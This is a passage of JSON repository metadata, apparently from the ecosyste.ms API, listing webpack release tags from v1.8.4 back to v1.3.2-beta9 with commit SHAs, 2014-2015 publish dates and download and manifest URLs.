l":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1